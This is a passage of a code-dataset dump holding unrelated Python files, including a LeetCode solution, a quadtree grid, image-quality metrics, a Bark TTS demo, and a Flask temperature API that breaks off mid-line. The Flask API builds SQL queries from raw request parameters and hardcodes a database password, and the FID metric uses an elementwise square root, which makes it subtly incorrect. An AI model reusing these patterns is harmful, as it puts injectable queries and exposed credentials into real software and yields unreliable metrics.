'\n\nim.write(imagen+'\\n')\nim.close()","repo_name":"hugo-araya/Seccion1","sub_path":"imagen_pgm/ran.py","file_name":"ran.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18744116964","text":"from typing import List\n\n\nclass Solution:\n def minAvailableDuration(self, slots1: List[List[int]], slots2: List[List[int]], duration: int) -> List[int]:\n idx1 = idx2 = 0\n\n slots1 = sorted(slots1)\n slots2 = sorted(slots2)\n\n while idx1 <= len(slots1) - 1 and idx2 <= len(slots2) - 1:\n s1 = slots1[idx1]\n s2 = slots2[idx2]\n left_intersection = max(s1[0], s2[0])\n right_intersection = min(s1[1], s2[1])\n if right_intersection - left_intersection >= duration:\n return [left_intersection, left_intersection + duration]\n\n # always move the one that ends earlier!\n if s1[1] < s2[1]:\n idx1 += 1\n else:\n idx2 += 1\n\n return []\n","repo_name":"ivankliuk/leetcode","sub_path":"python/meeting-scheduler.py","file_name":"meeting-scheduler.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3088785121","text":"from collections import defaultdict\nfrom typing import *\n\nfrom tqdm import tqdm\n\nfrom backend.trainers.components.mappings.base import _display_creation_kickoff_message\nfrom backend.trainers.components.mappings.token.occurrences import (\n ParaphrasesPOSTagsList,\n ParaphrasesTokens,\n ParaphrasesTokensList\n)\nfrom backend.trainers.components.mappings.token.sentence_indices.base import SentenceIndex2UniqueTokens\nfrom backend.trainers.components.sentence_data import SentenceData\nfrom backend.utils import iterables, strings\n\n\ndef token_maps_foundations(\n sentence_data: SentenceData,\n tokenize_with_pos_tags: Callable[[str], List[Tuple[str, str]]]\n) -> 
Tuple[SentenceIndex2UniqueTokens, Tuple[ParaphrasesTokensList, ParaphrasesPOSTagsList]]:\n\n # create paraphrases map\n english_sentence_2_paraphrases_with_indices = _english_sentence_paraphrases_with_indices_map(sentence_data=sentence_data)\n\n # define foundations\n sentence_index_2_unique_tokens: SentenceIndex2UniqueTokens = {}\n paraphrases_tokens_list: ParaphrasesTokensList = []\n paraphrases_pos_tags_list: ParaphrasesPOSTagsList = []\n\n # procure proper nouns\n proper_nouns: Set[str] = sentence_data.deduce_proper_nouns()\n\n print('Creating token maps foundations...')\n for paraphrases_with_indices in tqdm(english_sentence_2_paraphrases_with_indices.values()):\n paraphrases, indices = iterables.unzip(paraphrases_with_indices)\n\n # tokenize paraphrases and procure pos tags\n paraphrases_tokens_with_pos_tags: List[List[Tuple[str, str]]] = [tokenize_with_pos_tags(sentence) for sentence in paraphrases]\n if any(map(len, paraphrases_tokens_with_pos_tags)):\n paraphrases_tokens, paraphrases_pos_tags = map(iterables.none_stripped, iterables.unzip_longest(map(lambda paraphrase_tokens_with_pos_tags: iterables.unzip(paraphrase_tokens_with_pos_tags), paraphrases_tokens_with_pos_tags)))\n\n # strip proper nouns, tokens containing digits; convert to lowercase\n paraphrases_tokens = _process_paraphrases_tokens(paraphrases_tokens, proper_nouns=proper_nouns)\n\n # update foundations\n sentence_index_2_unique_tokens.update({index: set(comprising_tokens) for index, comprising_tokens in zip(indices, paraphrases_tokens)})\n paraphrases_tokens_list.append(paraphrases_tokens)\n paraphrases_pos_tags_list.append(paraphrases_pos_tags)\n\n return sentence_index_2_unique_tokens, (paraphrases_tokens_list, paraphrases_pos_tags_list)\n\n\n@_display_creation_kickoff_message('Creating paraphrases map...')\ndef _english_sentence_paraphrases_with_indices_map(sentence_data: SentenceData) -> DefaultDict[str, List[Tuple[str, int]]]:\n english_sentence_2_paraphrases = defaultdict(list)\n\n for i, (english_sentence, foreign_sentence) in enumerate(tqdm(sentence_data)):\n english_sentence_2_paraphrases[english_sentence].append((foreign_sentence, i))\n\n return english_sentence_2_paraphrases\n\n\ndef _process_paraphrases_tokens(paraphrases_tokens: ParaphrasesTokens, proper_nouns: Set[str]) -> ParaphrasesTokens:\n \"\"\" Removes proper nouns, tokens containing digits from paraphrases tokens,\n converts tokens to lowercase \"\"\"\n\n for i, paraphrase_tokens in enumerate(paraphrases_tokens):\n lowercase_paraphrase_tokens = (token.lower() for token in paraphrase_tokens)\n paraphrases_tokens[i] = list(filter(lambda token: token not in proper_nouns and strings.is_digit_free(token), lowercase_paraphrase_tokens))\n\n return paraphrases_tokens\n","repo_name":"w2sv/Lingularity-DataMiner","sub_path":"src/token_maps/foundations.py","file_name":"foundations.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11486050607","text":"import warnings\n\nimport numpy as np\nfrom ranges import Range\n\nfrom .state import State\nfrom .extent import RectangleExtent, Point2D\nfrom .utils import int_log2\n\n\ndef empty_quadtree(extent: RectangleExtent, default=State.DEAD):\n from .node import Quadtree\n assert extent.width == extent.height\n level = int_log2(extent.width)\n return Quadtree.empty(level, default)\n\n\nclass Grid(np.ndarray):\n @classmethod\n def from_list(cls, l):\n return np.asarray(l, dtype=object).view(cls)\n\n def 
__repr__(self):\n return f\"{self.__class__.__name__}(shape={self.shape})\"\n\n def __str__(self):\n if self.ndim != 2:\n warnings.warn(f'Grid should be 2-dimensional, got shape {self.shape}')\n return super().__str__()\n elif self.shape[0] > 0 and self.shape[1] > 0 and not isinstance(self[0, 0], State):\n return super().__str__()\n return '\\n'.join(''.join(str(state) for state in row) for row in self)\n\n @classmethod\n def from_str(cls, s):\n s = s.strip()\n lines = s.splitlines()\n return np.array([[State.from_str(c) for c in line.strip()] for line in lines], dtype=object).view(cls)\n\n @classmethod\n def uninhabitable(cls, width, height):\n # np.full casts our IntEnum to int64 despite dtype=object, so we first\n # create an empty array and then fill it\n grid = np.empty((height, width), dtype=object)\n grid[:] = State.UNINHABITABLE\n return grid.view(cls)\n\n @classmethod\n def dead(cls, width, height):\n grid = np.empty((height, width), dtype=object)\n grid[:] = State.DEAD\n return grid.view(cls)\n\n\nclass LazyGrid:\n def __init__(self, default=State.DEAD):\n assert isinstance(default, State)\n self.default = default\n self._grids = []\n\n def add_grid(self, offset: Point2D, grid: Grid):\n assert isinstance(grid, Grid)\n assert isinstance(offset, Point2D)\n extent = RectangleExtent(Range(offset.x, offset.x + grid.shape[1]), Range(offset.y, offset.y + grid.shape[0]))\n self._grids.append((extent, grid))\n\n def get_quadtree(self, extent: RectangleExtent):\n from .node import QuadtreeBranch, QuadtreeLeaf\n assert extent.width == extent.height\n if extent.width == 1:\n return QuadtreeLeaf(self[Point2D(extent.x_range.start, extent.y_range.start)])\n elif not any(extent.intersects(other_extent) for other_extent, _ in self._grids):\n return empty_quadtree(extent, self.default)\n else:\n assert extent.width % 2 == 0 and extent.height % 2 == 0\n half_width = extent.width // 2\n half_height = extent.height // 2\n ((nw, ne), (sw, se)) = extent.split_x_y()\n return QuadtreeBranch(np.array([\n [self.get_quadtree(nw), self.get_quadtree(ne)],\n [self.get_quadtree(sw), self.get_quadtree(se)]\n ], dtype=object))\n\n def __getitem__(self, point: Point2D):\n values = []\n for extent, grid in self._grids:\n if point in extent:\n values.append(grid[point.y - extent.y_range.start, point.x - extent.x_range.start])\n if values:\n if values[0] == State.UNINHABITABLE:\n assert all(value == State.UNINHABITABLE for value in values)\n return State.UNINHABITABLE\n elif any(value == State.ALIVE for value in values): # OR all values\n return State.ALIVE\n else:\n return State.DEAD\n return self.default\n\n\nclass GridFromQuadtree:\n def __init__(self, quadtree):\n self.quadtree = quadtree\n\n def __getitem__(self, point: Point2D):\n return self.quadtree.get_state(point.x, point.y)\n\n def initial_quadtree_and_extent(self):\n return self.quadtree, RectangleExtent(\n Range(0, self.quadtree.width()),\n Range(0, self.quadtree.width()),\n )\n\n def expand_quadtree_and_extent(self, quadtree, extent: RectangleExtent):\n from .node import QuadtreeBranch\n empty = empty_quadtree(extent)\n if (extent.x_range.start + extent.x_range.end) // 2 > 0:\n # Midpoint is positive; expand north-west\n new_extent = RectangleExtent(\n Range(extent.x_range.start - extent.width, extent.x_range.end),\n Range(extent.y_range.start - extent.height, extent.y_range.end),\n )\n new_quadtree = QuadtreeBranch(np.array([\n [empty, empty],\n [empty, quadtree]\n ], dtype=object))\n else:\n # Midpoint is negative; expand south-east\n new_extent = 
RectangleExtent(\n Range(extent.x_range.start, extent.x_range.end + extent.width),\n Range(extent.y_range.start, extent.y_range.end + extent.height),\n )\n new_quadtree = QuadtreeBranch(np.array([\n [quadtree, empty],\n [empty, empty]\n ], dtype=object))\n return (new_quadtree, new_extent)\n","repo_name":"joliss/hashlife3d","sub_path":"src/hashlife3d/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":5081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40164374455","text":"import sys\nimport cv2\nimport argparse\nimport time\nfrom pose.openpose.import_libs import openpose, openpose_model_folder\n\ntry:\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--image_dir\", default=\"../examples/media/\",\n help=\"Process a directory of images. Read all standard formats (jpg, png, bmp, etc.).\"\n )\n parser.add_argument(\"--no_display\", default=True, help=\"Enable to disable the visual display.\")\n args = parser.parse_known_args()\n\n # Custom Params (refer to include/openpose/flags.hpp for more parameters)\n params = dict()\n params[\"model_folder\"] = openpose_model_folder\n\n # Add others in path?\n for i in range(0, len(args[1])):\n curr_item = args[1][i]\n if i != len(args[1]) - 1:\n next_item = args[1][i + 1]\n else:\n next_item = \"1\"\n if \"--\" in curr_item and \"--\" in next_item:\n key = curr_item.replace('-', '')\n if key not in params: params[key] = \"1\"\n elif \"--\" in curr_item and \"--\" not in next_item:\n key = curr_item.replace('-', '')\n if key not in params: params[key] = next_item\n\n # Construct it from system arguments\n # op.init_argv(args[1])\n # oppython = op.OpenposePython()\n\n # Starting OpenPose\n opWrapper = openpose.WrapperPython()\n opWrapper.configure(params)\n opWrapper.start()\n\n # Read frames on directory\n imagePaths = openpose.get_images_on_directory(args[0].image_dir)\n start = time.time()\n\n # Process and display images\n for imagePath in imagePaths:\n datum = openpose.Datum()\n imageToProcess = cv2.imread(imagePath)\n datum.cvInputData = imageToProcess\n opWrapper.emplaceAndPop(openpose.VectorDatum([datum]))\n\n print(\"Body keypoints: \\n\" + str(datum.poseKeypoints))\n\n if not args[0].no_display:\n cv2.imshow(\"OpenPose 1.7.0 - Tutorial Python API\", datum.cvOutputData)\n key = cv2.waitKey(15)\n if key == 27:\n break\n\n end = time.time()\n print(\"OpenPose demo successfully finished. Total time: \" + str(end - start) + \" seconds\")\nexcept Exception as e:\n print(e)\n sys.exit(-1)\n","repo_name":"realzza/Presento","sub_path":"pose/openpose/04_keypoints_from_images.py","file_name":"04_keypoints_from_images.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72626342812","text":"import cv2\nimport numpy as np\nimport torch\n\n# convert 2/3/4-dimensional torch tensor to uint\ndef tensor2uint(img: torch.Tensor):\n img = img.squeeze().float().clamp_(0, 1).cpu().numpy()\n if img.ndim == 3:\n img = np.transpose(img, (1, 2, 0))\n return np.uint8((img*255.0).round())\n \ndef calculate_psnr(img1, img2, crop_border=0, input_order='HWC', test_y_channel=False):\n assert img1.shape == img2.shape, (f'Image shapes are different: {img1.shape}, {img2.shape}.')\n if input_order not in ['HWC', 'CHW']:\n raise ValueError(f'Wrong input_order {input_order}. 
Supported input_orders are ' '\"HWC\" and \"CHW\"')\n    img1 = reorder_image(img1, input_order=input_order)\n    img2 = reorder_image(img2, input_order=input_order)\n    img1 = img1.astype(np.float64)\n    img2 = img2.astype(np.float64)\n\n    if crop_border != 0:\n        img1 = img1[crop_border:-crop_border, crop_border:-crop_border, ...]\n        img2 = img2[crop_border:-crop_border, crop_border:-crop_border, ...]\n\n    if test_y_channel:\n        img1 = to_y_channel(img1)\n        img2 = to_y_channel(img2)\n\n    mse = np.mean((img1 - img2) ** 2)\n    if mse == 0:\n        return float('inf')\n    return 20. * np.log10(255. / np.sqrt(mse))\n\n\ndef _ssim(img1, img2):\n    C1 = (0.01 * 255) ** 2\n    C2 = (0.03 * 255) ** 2\n\n    img1 = img1.astype(np.float64)\n    img2 = img2.astype(np.float64)\n    kernel = cv2.getGaussianKernel(11, 1.5)\n    window = np.outer(kernel, kernel.transpose())\n\n    mu1 = cv2.filter2D(img1, -1, window)[5:-5, 5:-5]\n    mu2 = cv2.filter2D(img2, -1, window)[5:-5, 5:-5]\n    mu1_sq = mu1 ** 2\n    mu2_sq = mu2 ** 2\n    mu1_mu2 = mu1 * mu2\n    sigma1_sq = cv2.filter2D(img1 ** 2, -1, window)[5:-5, 5:-5] - mu1_sq\n    sigma2_sq = cv2.filter2D(img2 ** 2, -1, window)[5:-5, 5:-5] - mu2_sq\n    sigma12 = cv2.filter2D(img1 * img2, -1, window)[5:-5, 5:-5] - mu1_mu2\n\n    ssim_map = ((2 * mu1_mu2 + C1) * (2 * sigma12 + C2)) / ((mu1_sq + mu2_sq + C1) * (sigma1_sq + sigma2_sq + C2))\n    return ssim_map.mean()\n\n\ndef calculate_ssim(img1, img2, crop_border=0, input_order='HWC', test_y_channel=False):\n    assert img1.shape == img2.shape, (f'Image shapes are different: {img1.shape}, {img2.shape}.')\n    if img1.dtype is not np.uint8:\n        img1 = (img1 * 255.0).round().astype(np.uint8)  # float32 to uint8\n    if img2.dtype is not np.uint8:\n        img2 = (img2 * 255.0).round().astype(np.uint8)  # float32 to uint8\n    if input_order not in ['HWC', 'CHW']:\n        raise ValueError(f'Wrong input_order {input_order}. 
Supported input_orders are ' '\"HWC\" and \"CHW\"')\n    img1 = reorder_image(img1, input_order=input_order)\n    img2 = reorder_image(img2, input_order=input_order)\n    img1 = img1.astype(np.float64)\n    img2 = img2.astype(np.float64)\n\n    if crop_border != 0:\n        img1 = img1[crop_border:-crop_border, crop_border:-crop_border, ...]\n        img2 = img2[crop_border:-crop_border, crop_border:-crop_border, ...]\n\n    if test_y_channel:\n        img1 = to_y_channel(img1)\n        img2 = to_y_channel(img2)\n\n    ssims = []\n    for i in range(img1.shape[2]):\n        ssims.append(_ssim(img1[..., i], img2[..., i]))\n    return np.array(ssims).mean()\n\n\ndef _blocking_effect_factor(im):\n    block_size = 8\n\n    block_horizontal_positions = torch.arange(7, im.shape[3] - 1, 8)\n    block_vertical_positions = torch.arange(7, im.shape[2] - 1, 8)\n\n    horizontal_block_difference = (\n                (im[:, :, :, block_horizontal_positions] - im[:, :, :, block_horizontal_positions + 1]) ** 2).sum(\n        3).sum(2).sum(1)\n    vertical_block_difference = (\n                (im[:, :, block_vertical_positions, :] - im[:, :, block_vertical_positions + 1, :]) ** 2).sum(3).sum(\n        2).sum(1)\n\n    nonblock_horizontal_positions = np.setdiff1d(torch.arange(0, im.shape[3] - 1), block_horizontal_positions)\n    nonblock_vertical_positions = np.setdiff1d(torch.arange(0, im.shape[2] - 1), block_vertical_positions)\n\n    horizontal_nonblock_difference = (\n                (im[:, :, :, nonblock_horizontal_positions] - im[:, :, :, nonblock_horizontal_positions + 1]) ** 2).sum(\n        3).sum(2).sum(1)\n    vertical_nonblock_difference = (\n                (im[:, :, nonblock_vertical_positions, :] - im[:, :, nonblock_vertical_positions + 1, :]) ** 2).sum(\n        3).sum(2).sum(1)\n\n    n_boundary_horiz = im.shape[2] * (im.shape[3] // block_size - 1)\n    n_boundary_vert = im.shape[3] * (im.shape[2] // block_size - 1)\n    boundary_difference = (horizontal_block_difference + vertical_block_difference) / (\n                n_boundary_horiz + n_boundary_vert)\n\n    n_nonboundary_horiz = im.shape[2] * (im.shape[3] - 1) - n_boundary_horiz\n    n_nonboundary_vert = im.shape[3] * (im.shape[2] - 1) - n_boundary_vert\n    nonboundary_difference = (horizontal_nonblock_difference + vertical_nonblock_difference) / (\n                n_nonboundary_horiz + n_nonboundary_vert)\n\n    scaler = np.log2(block_size) / np.log2(min([im.shape[2], im.shape[3]]))\n    bef = scaler * (boundary_difference - nonboundary_difference)\n\n    bef[boundary_difference <= nonboundary_difference] = 0\n    return bef\n\n\ndef calculate_psnrb(img1, img2, crop_border, input_order='HWC', test_y_channel=False):\n    assert img1.shape == img2.shape, (f'Image shapes are different: {img1.shape}, {img2.shape}.')\n    if input_order not in ['HWC', 'CHW']:\n        raise ValueError(f'Wrong input_order {input_order}. 
Supported input_orders are ' '\"HWC\" and \"CHW\"')\n img1 = reorder_image(img1, input_order=input_order)\n img2 = reorder_image(img2, input_order=input_order)\n img1 = img1.astype(np.float64)\n img2 = img2.astype(np.float64)\n\n if crop_border != 0:\n img1 = img1[crop_border:-crop_border, crop_border:-crop_border, ...]\n img2 = img2[crop_border:-crop_border, crop_border:-crop_border, ...]\n\n if test_y_channel:\n img1 = to_y_channel(img1)\n img2 = to_y_channel(img2)\n\n img1 = torch.from_numpy(img1).permute(2, 0, 1).unsqueeze(0) / 255.\n img2 = torch.from_numpy(img2).permute(2, 0, 1).unsqueeze(0) / 255.\n\n total = 0\n for c in range(img1.shape[1]):\n mse = torch.nn.functional.mse_loss(img1[:, c:c + 1, :, :], img2[:, c:c + 1, :, :], reduction='none')\n bef = _blocking_effect_factor(img1[:, c:c + 1, :, :])\n\n mse = mse.view(mse.shape[0], -1).mean(1)\n total += 10 * torch.log10(1 / (mse + bef))\n\n return float(total) / img1.shape[1]\n\n\ndef reorder_image(img, input_order='HWC'):\n if input_order not in ['HWC', 'CHW']:\n raise ValueError(f'Wrong input_order {input_order}. Supported input_orders are ' \"'HWC' and 'CHW'\")\n if len(img.shape) == 2:\n img = img[..., None]\n if input_order == 'CHW':\n img = img.transpose(1, 2, 0)\n return img\n\n\ndef to_y_channel(img):\n img = img.astype(np.float32) / 255.\n if img.ndim == 3 and img.shape[2] == 3:\n img = rgb2ycbcr(img, y_only=True)\n img = img[..., None]\n else:\n raise ValueError(f'Wrong image shape [2]: {img.shape[2]}.')\n return img * 255.\n\n\ndef _convert_input_type_range(img):\n img_type = img.dtype\n img = img.astype(np.float32)\n if img_type == np.float32:\n pass\n elif img_type == np.uint8:\n img /= 255.\n else:\n raise TypeError('The img type should be np.float32 or np.uint8, ' f'but got {img_type}')\n return img\n\n\ndef _convert_output_type_range(img, dst_type):\n if dst_type not in (np.uint8, np.float32):\n raise TypeError('The dst_type should be np.float32 or np.uint8, ' f'but got {dst_type}')\n if dst_type == np.uint8:\n img = img.round()\n else:\n img /= 255.\n return img.astype(dst_type)\n\n\ndef rgb2ycbcr(img, y_only=False):\n img_type = img.dtype\n img = _convert_input_type_range(img)\n if y_only:\n out_img = np.dot(img, [65.481, 128.553, 24.966]) + 16.0\n else:\n out_img = np.matmul(\n img, [[65.481, -37.797, 112.0], [128.553, -74.203, -93.786],[24.966, 112.0, -18.214]]) + [16, 128, 128]\n out_img = _convert_output_type_range(out_img, img_type)\n return out_img\n\ndef calculate_fid_score(predicted_images, true_images, eps=1e-6):\n \"\"\"\n Calculates the Frechet Inception Distance (FID) score between predicted and true images.\n\n Args:\n predicted_images (torch.Tensor): Tensor containing the predicted images.\n true_images (torch.Tensor): Tensor containing the true images.\n eps (float): A small value to avoid division by zero. 
Default: 1e-6.\n\n Returns:\n float: The FID score between the predicted and true images.\n \"\"\"\n\n # Calculate the mean and covariance of the true images\n true_images = true_images.detach().cpu().numpy()\n true_images = np.transpose(true_images, (0, 2, 3, 1))\n true_images = (true_images * 255).astype(np.uint8)\n true_images = true_images.reshape(true_images.shape[0], -1)\n true_mean = np.mean(true_images, axis=0)\n true_cov = np.cov(true_images, rowvar=False)\n\n # Calculate the mean and covariance of the predicted images\n predicted_images = predicted_images.detach().cpu().numpy()\n predicted_images = np.transpose(predicted_images, (0, 2, 3, 1))\n predicted_images = (predicted_images * 255).astype(np.uint8)\n predicted_images = predicted_images.reshape(predicted_images.shape[0], -1)\n pred_mean = np.mean(predicted_images, axis=0)\n pred_cov = np.cov(predicted_images, rowvar=False)\n\n # Calculate the FID score\n fid = np.sum((true_mean - pred_mean)**2) + np.trace(true_cov + pred_cov - 2*np.sqrt(true_cov.dot(pred_cov))+eps)\n\n return fid","repo_name":"TheMoon2000/cs280-final-project","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6572969962","text":"import time\r\nimport json\r\n\r\nfrom bot_word_functions import word_clear\r\nfrom bot_leader_functions import clear_leader\r\n\r\n\r\ndef first_run(message): # Create *.json\r\n players = [dict(id=message.from_user.id, first_name=message.from_user.first_name,\r\n username=message.from_user.username, total_score=0, event_score=0, address=None)]\r\n with open(f'{message.chat.title}.json', 'w+') as f:\r\n json.dump(dict(chat_id=message.chat.id, game_id=0, is_event=None, leader_id=None, hidden_word=None,\r\n players=players), f, indent=4, ensure_ascii=False)\r\n\r\n\r\ndef check_admin(message, admins) -> bool:\r\n admins_list = []\r\n for admin in admins:\r\n if not admin.user.is_bot:\r\n admins_list.append(admin.user.id)\r\n for admin_id in admins_list:\r\n if message.from_user.id == admin_id:\r\n return True\r\n\r\n\r\ndef get_game_id(message) -> int:\r\n with open(f'{message.chat.title}.json', 'r') as f:\r\n chat_data = json.load(f)\r\n chat_data['game_id'] = chat_data['game_id'] + 1\r\n with open(f'{message.chat.title}.json', 'w') as f:\r\n json.dump(chat_data, f, indent=4, ensure_ascii=False)\r\n return chat_data['game_id']\r\n\r\n\r\ndef show_stat(message) -> str:\r\n with open(f'{message.chat.title}.json', 'r') as f:\r\n players_dict = json.load(f)\r\n new_dict = {}\r\n for player in players_dict['players']:\r\n if not players_dict['is_event']:\r\n new_dict[player['first_name']] = player['total_score']\r\n else:\r\n new_dict[player['first_name']] = player['event_score']\r\n sorted_new_dict_tuples = sorted(new_dict.items(), key=lambda item: item[1], reverse=True)\r\n sorted_dict = {k: v for k, v in sorted_new_dict_tuples}\r\n message_text = []\r\n place = 0\r\n for k in sorted_dict:\r\n place += 1\r\n if not players_dict['is_event']:\r\n message_text.append(f'{place}. Счет: {sorted_dict.get(k)} - {k}')\r\n else:\r\n message_text.append(f'{place}. 
Earn: {sorted_dict.get(k)} VQRC - {k}')\r\n return '\\n'.join(message_text)\r\n\r\n\r\ndef clear_round_data(message):\r\n clear_leader(message)\r\n word_clear(message)\r\n time.sleep(1)\r\n\r\n","repo_name":"surugh/vqr_p2e_crocodile_bot","sub_path":"bot_functions.py","file_name":"bot_functions.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6736809699","text":"from django import forms\nfrom . import models\n\n\nclass CommentForm(forms.ModelForm):\n class Meta:\n fields = (\"message\",\"files\",\"post\")\n model = models.Comment\n\n def __init__(self, *args, **kwargs):\n user = kwargs.pop(\"user\", None)\n super().__init__(*args, **kwargs)\n if user is not None:\n self.fields[\"post\"].queryset = (\n models.Post.objects.filter(\n pk__in=user.posts.values_list(\"post__pk\")\n )\n )\n","repo_name":"AgrawalNeha25/MyProdctivityToolKit","sub_path":"ToDo App/comments/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72609629531","text":"def ruler(num):\r\n i = 1\r\n list1 = \"\"\r\n list2 = \" \"\r\n while(i<=num):\r\n list1 += str(i % 10)\r\n i += 1\r\n if (i % 10 == 0):\r\n list2 += str(int(i / 10))\r\n else:\r\n list2 += \" \"\r\n\r\n print(list2)\r\n print(list1)\r\n\r\nnum = int(raw_input())\r\nruler(num)\r\n","repo_name":"harikad99/Python-Scripting--L1-Assignments","sub_path":"ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13556696851","text":"from datetime import datetime\n\nfrom dateutil import rrule\nfrom optimum.bettertransformer import BetterTransformer\nfrom transformers import AutoProcessor, BarkModel\nimport scipy\nimport torch\n# my_now = datetime.now()\n\n# def get_current_device():\n# # print(\"get_current_device...\")\n#\n# DEVICE = \"cuda\" if torch.cuda.is_available() else \"mps\" if torch.backends.mps.is_available() else \"cpu\"\n# DEVICE_ID = \"0\"\n# CUDA_DEVICE = f\"{DEVICE}:{DEVICE_ID}\" if DEVICE_ID else DEVICE\n# # if debug:\n# print(f\"DEVICE:{DEVICE}\")\n# return DEVICE, CUDA_DEVICE\n#\n# DEVICE, CUDA_DEVICE = get_current_device()\n\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n# device = \"cuda\" if torch.cuda.is_available() else \"mps\" if torch.backends.mps.is_available() else \"cpu\"\n\n# 指定本地模型\nmodel_path = \"/Users/jingwu/janewu/llm-model/bark/bark\"\nprocessor = AutoProcessor.from_pretrained(model_path)\nmodel = BarkModel.from_pretrained(model_path, torch_dtype=torch.float).to(device)\n\n# convert to bettertransformer\nmodel = BetterTransformer.transform(model, keep_original_model=False)\n\nsample_rate = model.generation_config.sample_rate\n\n\ndef do_tts(voice_preset, text_prompt, output_wave_fn):\n my_now = datetime.now()\n inputs = processor(text_prompt, voice_preset=voice_preset)\n # print(inputs)\n audio_array = model.generate(**inputs)\n audio_array = audio_array.cpu().numpy().squeeze()\n\n # save them as a .wav file\n scipy.io.wavfile.write(output_wave_fn, rate=sample_rate, data=audio_array)\n print(f\"[total spend]: {rrule.rrule(freq=rrule.SECONDLY, dtstart=my_now, until=datetime.now()).count()} seconds\")\n\n\ndef do_gen_example():\n # v2/en_speaker_6\" v2/en_speaker_0\"\n # \"v2/en_speaker_0\"\n text_prompt = \"Hi! Of course, we can talk about snacks. 
What would you like to discuss?\"\n # text_prompt = \"我是东圆有线网络有限公司的在线AI客服,由公司的开发团队开发。很抱歉,我无法提供开发者的联系方式。\"\n for i in range(10):\n voice_preset = f\"v2/en_speaker_{i}\"\n output_wave_fn = f\"bark_output_{i}.en.wav\"\n do_tts(voice_preset, text_prompt, output_wave_fn)\n\n\nif __name__ == '__main__':\n text_prompt = \"我是东圆有线网络有限公司的在线AI客服,由公司的开发团队开发。很抱歉,我无法提供开发者的联系方式。\"\n voice_preset = f\"v2/zh_speaker_0\"\n output_wave_fn = f\"bark_output_0.zh.wav\"\n do_tts(voice_preset, text_prompt, output_wave_fn)\n\n","repo_name":"janewu77/jshare-llm-demo","sub_path":"bark-demo/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"41930547761","text":"# distance calculation\n\nimport math\nimport time\nimport flask\nfrom flask import Flask\nimport requests\nfrom flask import request, jsonify\nfrom pymysql import *\nimport sys\nimport pandas as pd\nfrom flask import send_file\nfrom flask import render_template\n\napiKey = '**********'\ndb_name = \"guy_temps\"\nport = '1234'\nchart_template = 'chart_line.html'\n\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\n\n#db_opts = {'user': 'root', 'password': 'pass2014', 'host': '172.17.0.3', 'database': 'temprature'}\n\n\n@app.route('/', methods=['GET'])\ndef home():\n return '

    Temperature data restAPI
    Take a look
    for details, contact guy@example.com
    '\n\n\n@app.route('/temperature', methods=['GET']) # df2 = df[\"Fee\"].mean()\ndef calculate():\n if 'key' in request.args:\n if str(request.args['key']) == apiKey:\n if 'act' in request.args:\n\n if str(request.args['act']) == 'avg':\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n if 'from' in request.args:\n if 'to' in request.args:\n sql = f'select * from {db_name} where time_stamp between {str(request.args[\"from\"])} and {str(request.args[\"to\"])}'\n else:\n return 'Missing TO'\n else: \n sql = f\"SELECT * FROM {db_name}\"\n cursor.execute(sql)\n df = pd.read_sql(sql, connection)\n print(df)\n df2 = df[\"temp\"].mean()\n avg_value = str(df2)\n connection.close()\n return f'average value of Temp : {avg_value}'\n \n if str(request.args['act']) == 'min':\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n if 'from' in request.args:\n if 'to' in request.args:\n sql = f'select min(temp), time_stamp, humid from {db_name} where time_stamp between {str(request.args[\"from\"])} and {str(request.args[\"to\"])}'\n else:\n return 'Missing TO'\n else: \n sql = f\"SELECT min(temp), time_stamp, humid FROM {db_name}\"\n result = cursor.execute(sql)\n connection.commit()\n r = []\n for row in cursor:\n r.append(row)\n '''\n df = pd.read_sql(sql, connection)\n column = df[\"temp\"]\n index = df['temp'].idxmin()\n min_value = str([index+1, column.min()]) '''\n connection.close()\n return str(r)\n \n if str(request.args['act']) == 'max':\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n if 'from' in request.args:\n if 'to' in request.args:\n sql = f'select max(temp), time_stamp, humid from {db_name} where time_stamp between {str(request.args[\"from\"])} and {str(request.args[\"to\"])}'\n else:\n return 'Missing TO'\n else: \n sql = f\"SELECT max(temp), time_stamp, humid FROM {db_name}\"\n \n result = cursor.execute(sql)\n connection.commit()\n r = []\n for row in cursor:\n r.append(row)\n '''\n df = pd.read_sql(sql, connection)\n column = df[\"temp\"]\n timeStamp = df['time_stamp']\n index = df['temp'].idxmax()\n max_value = str([index+1, column.max()]) '''\n connection.close()\n return str(r)\n \n if str(request.args['act']) == 'save2file':\n csv_file_path = f'/tmp/temp_data_{time.time()}.csv'\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with 